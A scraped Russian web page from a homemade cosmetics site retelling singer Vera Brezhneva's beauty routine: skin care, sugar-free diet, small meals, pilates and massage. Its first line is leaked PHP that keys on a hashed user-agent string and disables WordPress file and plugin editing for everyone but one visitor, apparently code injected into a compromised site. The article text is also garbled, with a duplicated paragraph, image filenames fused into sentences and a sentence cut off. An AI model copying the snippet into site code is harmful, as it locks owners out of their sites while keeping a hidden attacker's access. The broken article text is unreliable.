if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Вера Брежнева делится секретами красоты | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Вера Брежнева делится секретами красоты

Украинская дива, звезда сцены и актриса, Вера Брежнева, радует своих поклонников не только запоминающимися хитами, красочными клипами и энергичными концертами. Помимо безусловного таланта Веры, не только ее поклонники поражаются необычайной красоте, стройной фигуре и ухоженному внешнему виду певицы.

Укра­ин­ская дива, звез­да сце­ны и актри­са, Вера Бреж­не­ва, раду­ет сво­их поклон­ни­ков не толь­ко запо­ми­на­ю­щи­ми­ся хита­ми, кра­соч­ны­ми кли­па­ми и энер­гич­ны­ми кон­цер­та­ми. Поми­мо без­услов­но­го талан­та Веры, не толь­ко ее поклон­ни­ки пора­жа­ют­ся необы­чай­ной кра­со­те, строй­ной фигу­ре и ухо­жен­но­му внеш­не­му виду певицы.

А если учи­ты­вать и тот факт, что Вера Бреж­не­ва уже ста­ла два­жды мамой, ее без­упреч­ная фигу­ра про­сто пора­жа­ет. Тако­му телу могут поза­ви­до­вать и неко­то­рые моло­день­кие девчушки.

Мно­гие могут поду­мать, что сек­рет ее при­вле­ка­тель­но­сти, кро­ет­ся в высо­кой попу­ляр­но­сти артист­ки. Ведь как мож­но не стать иде­а­лом, когда перед тобой откры­та доро­га в любой доро­гой спа-салон, кли­ни­ку пла­сти­че­ской хирур­гии или к ново­мод­но­му зару­беж­но­му косметологу.

Разу­ме­ет­ся, это мне­ние абсо­лют­но оши­боч­но, Вера тра­тит мно­го вре­ме­ни на уход за собой не толь­ко внешне, но и внут­ренне. Ведь без­упреч­ный внеш­ний вид зави­сит преж­де все­го от здо­ро­вья все­го орга­низ­ма, пра­виль­но­го рит­ма жиз­ни, береж­но­го под­бо­ра пита­ния и напит­ков и посто­ян­ных заня­тий спортом.

Итак, Вера Бреж­не­ва согла­си­лась поде­лить­ся неко­то­ры­ми сек­ре­та­ми сво­ей кра­со­ты, от кото­рой муж­чи­ны теря­ют дар речи от вос­хи­ще­ния, а жен­щи­ны – от зависти.

Уход за кожей лица

Vera-Brezhnev-released-a-CD-titled-Beauty-Secrets-of-Vera-BrezhnevВера Бреж­не­ва уде­ля­ет боль­шое вни­ма­ние сво­ей кожи лица. По ее сло­вам, кра­со­ту мож­но лег­ко утра­тить, если за ней не уха­жи­вать. По этой при­чине Вера пару раз в месяц посе­ща­ет кос­ме­то­ло­га. Но поми­мо это­го она уха­жи­ва­ет за лицом и само­сто­я­тель­но. Певи­ца все­гда очи­ща­ет кожу от маки­я­жа и уде­ля­ет боль­шое вни­ма­ние об интен­сив­ном увлаж­не­нии лица.

Ведь всем извест­но, что преж­де­вре­мен­ные мор­щи­ны и тре­щин­ки появ­ля­ют­ся как раз у обла­да­тель­ниц сухой кожи. Поэто­му что­бы оття­нуть про­цесс ста­ре­ния как мож­но даль­ше, непло­хим мето­дом явля­ет­ся посто­ян­ное увлаж­не­ние кожи лица и тела.

Питание

1386390560_383484147Как извест­но, Вера Бреж­не­ва обя­за­на сво­ей фигу­рой отнюдь не изну­ря­ю­щим дие­там. Она ест прак­ти­че­ски все, за неболь­шим, но очень стро­гим исключением.

Основ­ны­ми про­дук­та­ми, от кото­рых певи­ца отка­за­лась, явля­ют­ся сахар, муч­ные изде­лия и сла­до­сти. Каза­лось бы, неко­то­рые совре­мен­ные девуш­ки не могут пред­ста­вить себе жизнь без гази­ро­вок, шоко­ла­да и пирож­ных. Одна­ко, как гово­рит­ся, кра­со­та тре­бу­ет жертв. Так что выбор оста­ет­ся за вами: что важ­нее: кра­си­вая фигу­ра как с облож­ки мод­но­го жур­на­ла или вкус­ный десерт.

Сле­ду­ю­щее пра­ви­ло, кото­ро­му сле­ду­ет Вера Бреж­не­ва для под­дер­жа­ния сво­е­го тела чистым, кра­си­вым и энер­гич­ным – это дроб­ное пита­ние. Ее еди­но­ра­зо­вая пор­ция может вполне уме­стит­ся в чело­ве­че­ской ладо­ни. Такое изме­не­ние в раци­оне кажет­ся не менее абсурд­ным, чем преды­ду­щее. В совре­мен­ном рит­ме, посто­ян­ной сума­то­хе и рабо­чем хау­се, абсо­лют­но нет вре­ме­ни на то, что­бы питать­ся по немно­го и несколь­ко раз. Боль­шин­ство деву­шек совсем не сле­дят за сво­им пита­ни­ем в тече­ние рабо­че­го дня и нае­да­ют­ся до отва­ла, как толь­ко пере­сту­пят порог дома. Это совсем не пра­виль­но не толь­ко с точ­ки зре­ния забо­ты о внеш­нем обли­ке, но и созда­ет боль­шую нагруз­ку на пище­ва­ри­тель­ную систе­му. Такой образ жиз­ни может повлечь за собой про­бле­мы со здоровьем.

В дру­гих аспек­тах здо­ро­во­го пита­ния Вера Бреж­не­ва ста­ра­ет­ся най­ти золо­тую сере­ди­ну. Как гово­рит­ся, все полез­но, если в меру. Глав­ное для хоро­ше­го нача­ла дня – это плот­ный зав­трак, он при­даст ваше­му орга­низ­му доста­точ­ную энер­гию на целый день и не будет гру­зом для желуд­ка, как, к при­ме­ру, позд­ний плот­ный ужин.

_omТак­же в раци­оне певи­цы при­сут­ству­ют каши, море­про­дук­ты, ово­щи, бобы, сыр и фре­ши. Важ­ным состав­ля­ю­щим ее пита­ния явля­ют­ся све­жие фрук­ты, ово­щи и, разу­ме­ет­ся, вода. Спе­ци­а­ли­сты реко­мен­ду­ют выпи­вать в день око­ло 2 лит­ров воды в день. Имен­но воды, а не жид­ко­сти! Чай, ком­по­ты, а тем более гази­ров­ки не считаются.

В здоровом теле – здоровый дух

Вера Бреж­не­ва любит спорт, и зани­ма­ет­ся им мини­мум три раза в неде­лю. Самый люби­мый вид спор­та – пожа­луй, пила­тес, но певи­ца регу­ляр­но дела­ет так­же и ком­плекс упраж­не­ний на силу и мышеч­ную мас­су. Отдель­ное место зани­ма­ют и полез­ные не толь­ко для фигу­ры, но и для здо­ро­вья и дол­го­ле­тия – кардиотренировки.

Уход за телом

Люби­мая про­це­ду­ра певи­цы по ухо­ду за телом – это общий мас­саж. Извест­но, что он помо­га­ет нала­дить цир­ку­ля­цию кро­ви, под­тя­нуть кожу, а так­же улуч­шить общее само­чув­ствие. Кро­ме того Вера еже­днев­но при­ни­ма­ет кон­траст­ный душ. Этот спо­соб вод­ных про­це­дур не толь­ко помо­га­ет взбод­рить­ся и почув­ство­вать при­лив сил, но и спо­соб­ству­ет упру­го­сти кожи.

Лечебная косметика

Вера Бреж­не­ва пред­по­чи­та­ет кос­ме­ти­ку, состо­я­щую из при­род­ных ком­по­нен­тов. К тому же певи­ца в повсе­днев­ной жиз­ни обхо­дит­ся прак­ти­че­ски без маки­я­жа. Важ­но пони­мать, что тон­на тональ­но­го кре­ма, пуд­ры и теней на вашем лице вли­я­ют на кожу отнюдь не поло­жи­тель­но. Помни­те, что скры­вая мел­кие недо­стат­ки сего­дня, вы получите


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Ангелина Левковская

Увлекаюсь косметологией. Особенно интересно делать своими руками разные кремчики, масочки, лосьончики... ммм, класс! Читайте все мои записи!